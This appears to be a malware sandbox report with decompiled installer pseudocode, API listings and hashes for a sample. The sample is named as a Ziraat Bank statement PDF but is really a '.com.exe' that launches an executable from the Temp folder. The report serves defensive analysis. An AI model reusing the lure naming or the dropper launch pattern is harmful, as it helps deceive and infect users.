                                                  				WCHAR* _t117;
                                                  				struct HWND__* _t118;
                                                  
                                                  				if(_a8 != 0x110) {
                                                  					if(_a8 != 0x111) {
                                                  						L13:
                                                  						if(_a8 != 0x4e) {
                                                  							if(_a8 == 0x40b) {
                                                  								 *0x421714 =  *0x421714 + 1;
                                                  							}
                                                  							L27:
                                                  							_t114 = _a16;
                                                  							L28:
                                                  							return E0040462B(_a8, _a12, _t114);
                                                  						}
                                                  						_t56 = GetDlgItem(_a4, 0x3e8);
                                                  						_t114 = _a16;
                                                  						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
                                                  							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
                                                  							_t113 =  *((intOrPtr*)(_t114 + 0x18));
                                                  							_v12 = _t103;
                                                  							_v16 = _t113;
                                                  							_v8 = 0x428200;
                                                  							if(_t103 - _t113 < 0x800) {
                                                  								SendMessageW(_t56, 0x44b, 0,  &_v16);
                                                  								SetCursor(LoadCursorW(0, 0x7f02));
                                                  								_push(1);
                                                  								E00404A32(_a4, _v8);
                                                  								SetCursor(LoadCursorW(0, 0x7f00));
                                                  								_t114 = _a16;
                                                  							}
                                                  						}
                                                  						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
                                                  							goto L28;
                                                  						} else {
                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
                                                  								SendMessageW( *0x42a268, 0x111, 1, 0);
                                                  							}
                                                  							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
                                                  								SendMessageW( *0x42a268, 0x10, 0, 0);
                                                  							}
                                                  							return 1;
                                                  						}
                                                  					}
                                                  					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
                                                  						goto L27;
                                                  					} else {
                                                  						_t116 =  *0x422720 + 0x14;
                                                  						if(( *_t116 & 0x00000020) == 0) {
                                                  							goto L27;
                                                  						}
                                                  						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                                                  						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
                                                  						E00404A0E();
                                                  						goto L13;
                                                  					}
                                                  				}
                                                  				_t117 = _a16;
                                                  				_t75 =  *(_t117 + 0x30);
                                                  				if(_t75 < 0) {
                                                  					_t75 =  *( *0x42923c - 4 + _t75 * 4);
                                                  				}
                                                  				_t76 =  *0x42a298 + _t75 * 2;
                                                  				_t110 =  *_t76 & 0x0000ffff;
                                                  				_a8 = _t110;
                                                  				_t78 =  &(_t76[1]);
                                                  				_a16 = _t78;
                                                  				_v16 = _t78;
                                                  				_v12 = 0;
                                                  				_v8 = E00404734;
                                                  				if(_t110 != 2) {
                                                  					_v8 = E004046FA;
                                                  				}
                                                  				_push( *((intOrPtr*)(_t117 + 0x34)));
                                                  				_push(0x22);
                                                  				E004045C4(_a4);
                                                  				_push( *((intOrPtr*)(_t117 + 0x38)));
                                                  				_push(0x23);
                                                  				E004045C4(_a4);
                                                  				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                                                  				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
                                                  				_t118 = GetDlgItem(_a4, 0x3e8);
                                                  				E004045F9(_t118);
                                                  				SendMessageW(_t118, 0x45b, 1, 0);
                                                  				_t92 =  *( *0x42a270 + 0x68);
                                                  				if(_t92 < 0) {
                                                  					_t92 = GetSysColor( ~_t92);
                                                  				}
                                                  				SendMessageW(_t118, 0x443, 0, _t92);
                                                  				SendMessageW(_t118, 0x445, 0, 0x4010000);
                                                  				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
                                                  				 *0x421714 = 0;
                                                  				SendMessageW(_t118, 0x449, _a8,  &_v16);
                                                  				 *0x421714 = 0;
                                                  				return 0;
                                                  			}



















                                                  APIs
                                                  • CheckDlgButton.USER32 ref: 00404821
                                                  • GetDlgItem.USER32 ref: 00404835
                                                  • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                  • GetSysColor.USER32(?), ref: 00404863
                                                  • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                  • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                  • lstrlenW.KERNEL32(?), ref: 00404884
                                                  • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                  • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                  • GetDlgItem.USER32 ref: 004048FF
                                                  • SendMessageW.USER32(00000000), ref: 00404906
                                                  • GetDlgItem.USER32 ref: 00404931
                                                  • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                  • SetCursor.USER32(00000000), ref: 00404985
                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                  • SetCursor.USER32(00000000), ref: 004049A1
                                                  • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                  Strings
                                                  • N, xrefs: 0040491F
                                                  • "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i, xrefs: 00404960
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$N
                                                  • API String ID: 3103080414-2488609871
                                                  • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                  • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                  • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                  • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004062AE(void* __ecx) {
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				long _t12;
                                                  				long _t24;
                                                  				char* _t31;
                                                  				int _t37;
                                                  				void* _t38;
                                                  				intOrPtr* _t39;
                                                  				long _t42;
                                                  				WCHAR* _t44;
                                                  				void* _t46;
                                                  				void* _t48;
                                                  				void* _t49;
                                                  				void* _t52;
                                                  				void* _t53;
                                                  
                                                  				_t38 = __ecx;
                                                  				_t44 =  *(_t52 + 0x14);
                                                  				 *0x426de8 = 0x55004e;
                                                  				 *0x426dec = 0x4c;
                                                  				if(_t44 == 0) {
                                                  					L3:
                                                  					_t2 = _t52 + 0x1c; // 0x4275e8
                                                  					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                  						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
                                                  						_t53 = _t52 + 0x10;
                                                  						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
                                                  						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
                                                  						_t48 = _t12;
                                                  						 *(_t53 + 0x18) = _t48;
                                                  						if(_t48 != 0xffffffff) {
                                                  							_t42 = GetFileSize(_t48, 0);
                                                  							_t6 = _t37 + 0xa; // 0xa
                                                  							_t46 = GlobalAlloc(0x40, _t42 + _t6);
                                                  							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
                                                  								L18:
                                                  								return CloseHandle(_t48);
                                                  							} else {
                                                  								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
                                                  									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
                                                  									if(_t49 == 0) {
                                                  										_t48 =  *(_t53 + 0x18);
                                                  										L16:
                                                  										_t24 = _t42;
                                                  										L17:
                                                  										E00406113(_t24 + _t46, 0x4269e8, _t37);
                                                  										SetFilePointer(_t48, 0, 0, 0);
                                                  										E0040620A(_t48, _t46, _t42 + _t37);
                                                  										GlobalFree(_t46);
                                                  										goto L18;
                                                  									}
                                                  									_t39 = _t46 + _t42;
                                                  									_t31 = _t39 + _t37;
                                                  									while(_t39 > _t49) {
                                                  										 *_t31 =  *_t39;
                                                  										_t31 = _t31 - 1;
                                                  										_t39 = _t39 - 1;
                                                  									}
                                                  									_t24 = _t49 - _t46 + 1;
                                                  									_t48 =  *(_t53 + 0x18);
                                                  									goto L17;
                                                  								}
                                                  								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
                                                  								_t42 = _t42 + 0xa;
                                                  								goto L16;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					CloseHandle(E00406158(_t44, 0, 1));
                                                  					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
                                                  					if(_t12 != 0 && _t12 <= 0x400) {
                                                  						goto L3;
                                                  					}
                                                  				}
                                                  				return _t12;
                                                  			}



















                                                  APIs
                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                  • GetShortPathNameW.KERNEL32 ref: 004062F2
                                                    • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                    • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                  • GetShortPathNameW.KERNEL32 ref: 0040630F
                                                  • wsprintfA.USER32 ref: 0040632D
                                                  • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                  • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                  • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                  • GlobalFree.KERNEL32 ref: 00406416
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                    • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\T.C.Ziraat Bankasi A.S_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                                    • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                  • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                  • API String ID: 2171350718-2295842750
                                                  • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                  • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                  • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                                  • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 90%
                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                                                  				struct tagLOGBRUSH _v16;
                                                  				struct tagRECT _v32;
                                                  				struct tagPAINTSTRUCT _v96;
                                                  				struct HDC__* _t70;
                                                  				struct HBRUSH__* _t87;
                                                  				struct HFONT__* _t94;
                                                  				long _t102;
                                                  				signed int _t126;
                                                  				struct HDC__* _t128;
                                                  				intOrPtr _t130;
                                                  
                                                  				if(_a8 == 0xf) {
                                                  					_t130 =  *0x42a270;
                                                  					_t70 = BeginPaint(_a4,  &_v96);
                                                  					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                                                  					_a8 = _t70;
                                                  					GetClientRect(_a4,  &_v32);
                                                  					_t126 = _v32.bottom;
                                                  					_v32.bottom = _v32.bottom & 0x00000000;
                                                  					while(_v32.top < _t126) {
                                                  						_a12 = _t126 - _v32.top;
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						asm("cdq");
                                                  						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                                                  						_t87 = CreateBrushIndirect( &_v16);
                                                  						_v32.bottom = _v32.bottom + 4;
                                                  						_a16 = _t87;
                                                  						FillRect(_a8,  &_v32, _t87);
                                                  						DeleteObject(_a16);
                                                  						_v32.top = _v32.top + 4;
                                                  					}
                                                  					if( *(_t130 + 0x58) != 0xffffffff) {
                                                  						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
                                                  						_a16 = _t94;
                                                  						if(_t94 != 0) {
                                                  							_t128 = _a8;
                                                  							_v32.left = 0x10;
                                                  							_v32.top = 8;
                                                  							SetBkMode(_t128, 1);
                                                  							SetTextColor(_t128,  *(_t130 + 0x58));
                                                  							_a8 = SelectObject(_t128, _a16);
                                                  							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
                                                  							SelectObject(_t128, _a8);
                                                  							DeleteObject(_a16);
                                                  						}
                                                  					}
                                                  					EndPaint(_a4,  &_v96);
                                                  					return 0;
                                                  				}
                                                  				_t102 = _a16;
                                                  				if(_a8 == 0x46) {
                                                  					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                  					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
                                                  				}
                                                  				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                  			}













                                                  APIs
                                                  • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                  • GetClientRect.USER32 ref: 0040105B
                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                  • FillRect.USER32 ref: 004010E4
                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                  • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                  • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                  • String ID: F
                                                  • API String ID: 941294808-1304234792
                                                  • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                  • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                  • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                  • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 72%
                                                  			E004066A5(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                  				struct _ITEMIDLIST* _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed int _v24;
                                                  				signed int _v28;
                                                  				signed int _t44;
                                                  				WCHAR* _t45;
                                                  				signed char _t47;
                                                  				signed int _t48;
                                                  				short _t59;
                                                  				short _t61;
                                                  				short _t63;
                                                  				void* _t71;
                                                  				signed int _t77;
                                                  				signed int _t78;
                                                  				short _t81;
                                                  				short _t82;
                                                  				signed char _t84;
                                                  				signed int _t85;
                                                  				void* _t98;
                                                  				void* _t104;
                                                  				intOrPtr* _t105;
                                                  				void* _t107;
                                                  				WCHAR* _t108;
                                                  				void* _t110;
                                                  
                                                  				_t107 = __esi;
                                                  				_t104 = __edi;
                                                  				_t71 = __ebx;
                                                  				_t44 = _a8;
                                                  				if(_t44 < 0) {
                                                  					_t44 =  *( *0x42923c - 4 + _t44 * 4);
                                                  				}
                                                  				_push(_t71);
                                                  				_push(_t107);
                                                  				_push(_t104);
                                                  				_t105 =  *0x42a298 + _t44 * 2;
                                                  				_t45 = 0x428200;
                                                  				_t108 = 0x428200;
                                                  				if(_a4 >= 0x428200 && _a4 - 0x428200 >> 1 < 0x800) {
                                                  					_t108 = _a4;
                                                  					_a4 = _a4 & 0x00000000;
                                                  				}
                                                  				_t81 =  *_t105;
                                                  				_a8 = _t81;
                                                  				if(_t81 == 0) {
                                                  					L43:
                                                  					 *_t108 =  *_t108 & 0x00000000;
                                                  					if(_a4 == 0) {
                                                  						return _t45;
                                                  					}
                                                  					return E00406668(_a4, _t45);
                                                  				} else {
                                                  					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                  						_t98 = 2;
                                                  						_t105 = _t105 + _t98;
                                                  						if(_t81 >= 4) {
                                                  							if(__eflags != 0) {
                                                  								 *_t108 = _t81;
                                                  								_t108 = _t108 + _t98;
                                                  								__eflags = _t108;
                                                  							} else {
                                                  								 *_t108 =  *_t105;
                                                  								_t108 = _t108 + _t98;
                                                  								_t105 = _t105 + _t98;
                                                  							}
                                                  							L42:
                                                  							_t82 =  *_t105;
                                                  							_a8 = _t82;
                                                  							if(_t82 != 0) {
                                                  								_t81 = _a8;
                                                  								continue;
                                                  							}
                                                  							goto L43;
                                                  						}
                                                  						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                  						_t47 =  *_t105;
                                                  						_t48 = _t47 & 0x000000ff;
                                                  						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                  						_t85 = _t84 & 0x000000ff;
                                                  						_v28 = _t48 | 0x00008000;
                                                  						_t77 = 2;
                                                  						_v16 = _t85;
                                                  						_t105 = _t105 + _t77;
                                                  						_v24 = _t48;
                                                  						_v20 = _t85 | 0x00008000;
                                                  						if(_a8 != _t77) {
                                                  							__eflags = _a8 - 3;
                                                  							if(_a8 != 3) {
                                                  								__eflags = _a8 - 1;
                                                  								if(__eflags == 0) {
                                                  									__eflags = (_t48 | 0xffffffff) - _v12;
                                                  									E004066A5(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                  								}
                                                  								L38:
                                                  								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                  								_t45 = 0x428200;
                                                  								goto L42;
                                                  							}
                                                  							_t78 = _v12;
                                                  							__eflags = _t78 - 0x1d;
                                                  							if(_t78 != 0x1d) {
                                                  								__eflags = (_t78 << 0xb) + 0x42b000;
                                                  								E00406668(_t108, (_t78 << 0xb) + 0x42b000);
                                                  							} else {
                                                  								E004065AF(_t108,  *0x42a268);
                                                  							}
                                                  							__eflags = _t78 + 0xffffffeb - 7;
                                                  							if(__eflags < 0) {
                                                  								L29:
                                                  								E004068EF(_t108);
                                                  							}
                                                  							goto L38;
                                                  						}
                                                  						if( *0x42a2e4 != 0) {
                                                  							_t77 = 4;
                                                  						}
                                                  						_t121 = _t48;
                                                  						if(_t48 >= 0) {
                                                  							__eflags = _t48 - 0x25;
                                                  							if(_t48 != 0x25) {
                                                  								__eflags = _t48 - 0x24;
                                                  								if(_t48 == 0x24) {
                                                  									GetWindowsDirectoryW(_t108, 0x400);
                                                  									_t77 = 0;
                                                  								}
                                                  								while(1) {
                                                  									__eflags = _t77;
                                                  									if(_t77 == 0) {
                                                  										goto L26;
                                                  									}
                                                  									_t59 =  *0x42a264;
                                                  									_t77 = _t77 - 1;
                                                  									__eflags = _t59;
                                                  									if(_t59 == 0) {
                                                  										L22:
                                                  										_t61 = SHGetSpecialFolderLocation( *0x42a268,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                  										__eflags = _t61;
                                                  										if(_t61 != 0) {
                                                  											L24:
                                                  											 *_t108 =  *_t108 & 0x00000000;
                                                  											__eflags =  *_t108;
                                                  											continue;
                                                  										}
                                                  										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                  										_a8 = _t61;
                                                  										__imp__CoTaskMemFree(_v8);
                                                  										__eflags = _a8;
                                                  										if(_a8 != 0) {
                                                  											goto L26;
                                                  										}
                                                  										goto L24;
                                                  									}
                                                  									_t63 =  *_t59( *0x42a268,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                  									__eflags = _t63;
                                                  									if(_t63 == 0) {
                                                  										goto L26;
                                                  									}
                                                  									goto L22;
                                                  								}
                                                  								goto L26;
                                                  							}
                                                  							GetSystemDirectoryW(_t108, 0x400);
                                                  							goto L26;
                                                  						} else {
                                                  							E00406536( *0x42a298, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x42a298 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                  							if( *_t108 != 0) {
                                                  								L27:
                                                  								if(_v16 == 0x1a) {
                                                  									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                  								}
                                                  								goto L29;
                                                  							}
                                                  							E004066A5(_t77, _t105, _t108, _t108, _v16);
                                                  							L26:
                                                  							if( *_t108 == 0) {
                                                  								goto L29;
                                                  							}
                                                  							goto L27;
                                                  						}
                                                  					}
                                                  					goto L43;
                                                  				}
                                                  			}

                                                  APIs
                                                  • GetSystemDirectoryW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000400), ref: 004067C0
                                                  • GetWindowsDirectoryW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000400,00000000,00422728,?,00405701,00422728,00000000,00000000,00000000,00000000), ref: 004067D3
                                                  • lstrcatW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                  • lstrlenW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.263281094.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.263266862.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263355807.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.000000000040E000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263371497.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.263431713.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_T.jbxd
                                                  Similarity
                                                  • API ID: Directory$SystemWindowslstrcatlstrlen
                                                  • String ID: "C:\Users\user~1\AppData\Local\Temp\oaqcoreqiw.exe" C:\Users\user~1\AppData\Local\Temp\xptrw.i$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 4260037668-2084297249
                                                  • Opcode ID: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                  • Instruction ID: 414c90a3e727c3679fd522760d05a71ccfd37451a898d0680c6fb4b4ce958948
                                                  • Opcode Fuzzy Hash: 1c129aaeae4721ad32508ffaab04e099ccdaef91abef8552f1ca909acb5604ca
                                                  • Instruction Fuzzy Hash: CD61E172A02115EBDB20AF64CD40BAA37A5EF10314F22C13EE946B62D0DB3D49A1CB5D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E004056CA(signed int _a4, WCHAR* _a8) {
                                                  				struct HWND__* _v8;
                                                  				signed int _v12;
                                                  				WCHAR* _v32;
                                                  				long _v44;
                                                  				int _v48;
                                                  				void* _v52;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				WCHAR* _t27;
                                                  				signed int _t28;
                                                  				long _t29;
                                                  				signed int _t37;
                                                  				signed int _t38;
                                                  
                                                  				_t27 =  *0x429244;
                                                  				_v8 = _t27;
                                                  				if(_t27 != 0) {
                                                  					_t37 =  *0x42a314;
                                                  					_v12 = _t37;
                                                  					_t38 = _t37 & 0x00000001;
                                                  					if(_t38 == 0) {
                                                  						E004066A5(_t38, 0, 0x422728, 0x422728, _a4);
                                                  					}
                                                  					_t27 = lstrlenW(0x422728);
                                                  					_a4 = _t27;
                                                  					if(_a8 == 0) {
                                                  						L6:
                                                  						if((_v12 & 0x00000004) == 0) {
                                                  							_t27 = SetWindowTextW( *0x429228, 0x422728);
                                                  						}
                                                  						if((_v12 & 0x00000002) == 0) {
                                                  							_v32 = 0x422728;
                                                  							_v52 = 1;
                                                  							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                  							_v44 = 0;
                                                  							_v48 = _t29 - _t38;
                                                  							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
